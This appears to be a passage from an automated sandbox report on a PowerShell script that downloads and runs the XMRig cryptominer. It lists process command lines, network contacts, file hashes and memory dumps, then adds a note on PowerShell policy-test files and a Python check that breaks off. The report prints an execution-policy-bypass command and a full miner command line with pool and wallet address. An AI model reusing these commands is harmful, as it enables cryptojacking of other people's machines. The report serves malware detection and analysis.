N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.104:443 www.bing.com tcp
US 8.8.8.8:53 104.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

memory/4548-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/4548-6-0x0000023A8EA90000-0x0000023A8EAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_savfhfya.udc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4548-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/4548-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/4548-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/4548-15-0x0000023AA7900000-0x0000023AA7912000-memory.dmp

memory/4548-16-0x0000023A8E8F0000-0x0000023A8E8FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3252-47-0x0000021399990000-0x00000213999B0000-memory.dmp

memory/3252-48-0x00000213999D0000-0x00000213999F0000-memory.dmp

memory/3252-49-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-51-0x00000213999F0000-0x0000021399A10000-memory.dmp

memory/4548-50-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/4548-52-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3252-54-0x0000021399A10000-0x0000021399A30000-memory.dmp

memory/3252-53-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/4548-55-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3252-56-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-58-0x00000213999F0000-0x0000021399A10000-memory.dmp

memory/3252-57-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-59-0x0000021399A10000-0x0000021399A30000-memory.dmp

memory/3252-60-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-61-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-62-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-63-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-64-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-65-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-66-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-67-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-68-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-69-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-70-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-71-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-72-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-73-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-74-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-75-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-76-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-77-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-78-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-79-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-80-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-81-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-82-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-83-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-84-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-85-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-86-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-87-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-88-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-89-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-90-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-91-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-92-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-93-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-94-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-95-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-96-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-97-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-98-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-99-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-100-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-101-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-102-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-103-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-104-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-105-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-106-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-107-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-108-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-109-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-110-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-111-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-112-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-113-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-114-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-115-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-116-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-117-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-118-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows in the original: the rule matched 64 times, and the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2736-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hzlybflj.izs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2736-9-0x000001DA46EC0000-0x000001DA46EE2000-memory.dmp

memory/2736-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-12-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-14-0x000001DA46F40000-0x000001DA46F52000-memory.dmp

memory/2736-15-0x000001DA46F30000-0x000001DA46F3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3936-46-0x000002C575BE0000-0x000002C575C00000-memory.dmp

memory/3936-47-0x000002C577520000-0x000002C577540000-memory.dmp

memory/3936-48-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-51-0x000002C577560000-0x000002C577580000-memory.dmp

memory/3936-50-0x000002C577540000-0x000002C577560000-memory.dmp

memory/2736-49-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-53-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

memory/3936-52-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-54-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-57-0x000002C577560000-0x000002C577580000-memory.dmp

memory/3936-56-0x000002C577540000-0x000002C577560000-memory.dmp

memory/3936-55-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-58-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-59-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-60-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-61-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-62-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-63-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-64-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-65-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-66-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-67-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-68-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-69-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-70-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-71-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-72-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-73-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-74-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-75-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-76-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-77-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-78-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-79-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-80-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-81-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-82-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-83-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-84-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-85-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-86-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-87-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-88-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-89-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-90-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-91-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-92-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-93-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-94-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-95-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-96-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-97-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-98-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-99-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-100-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-101-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-102-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-103-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-104-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-105-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-106-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-107-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-108-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-109-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-110-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-111-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-112-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-113-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-114-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-115-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-116-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows in the original: the rule matched 64 times, and the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3508-3-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x0000026820C10000-0x0000026820C32000-memory.dmp

memory/3508-6-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x0000026820DC0000-0x0000026820E36000-memory.dmp

memory/3508-15-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfccs3zs.tye.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x0000026820DA0000-0x0000026820DB2000-memory.dmp

memory/3508-61-0x0000026820D80000-0x0000026820D8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3708-90-0x000001A53DF90000-0x000001A53DFB0000-memory.dmp

memory/3508-91-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-92-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3708-93-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3508-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3708-95-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-96-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-97-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-98-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-99-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-100-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-101-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-102-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-103-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-104-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-105-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-106-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-107-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-108-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-109-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-110-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-111-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-112-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-113-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-114-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-115-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-116-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-117-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-118-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-119-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-120-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-121-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-122-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-123-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-124-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-125-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-126-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-127-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-128-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-129-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-130-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-131-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-132-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-133-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-134-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-135-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-136-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-137-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-138-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-139-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-140-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-141-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-142-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-143-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-144-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-145-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-146-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-147-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-148-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-149-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-150-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-151-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-152-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-153-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-154-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-155-0x00007FF787B20000-0x00007FF788753000-memory.dmp

memory/3708-156-0x00007FF787B20000-0x00007FF788753000-memory.dmp
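The Files sections of behavioral3, behavioral4, behavioral5 and behavioral18 each list two written files besides the memory dumps: a __PSScriptPolicyTest_*.ps1 under %TEMP% and the xmrig.exe binary. The .ps1 is not attacker-dropped: powershell.exe writes a file with that name pattern at startup to probe whether AppLocker/WDAC constrains script execution, and on the two win10-20240404 detonations its MD5/SHA1/SHA256 are exactly the hashes of the single character "1". Only xmrig.exe (the same hashes in all four detonations) is a payload worth hunting for. The following is an added example, not part of the sandbox report: it takes the path and hashes from the Files sections, separates PowerShell's own artifact from the dropped executable, and verifies the probe-body hashes locally. The classification of a .exe written under AppData\Local\Temp as a "dropped executable" is this example's own heuristic, backed here by the report's "Executes dropped EXE" signature.

```python
import hashlib
import re

# Entries copied from the report's Files sections (behavioral3 and behavioral5): (path, md5, sha1, sha256).
REPORT_FILES = [
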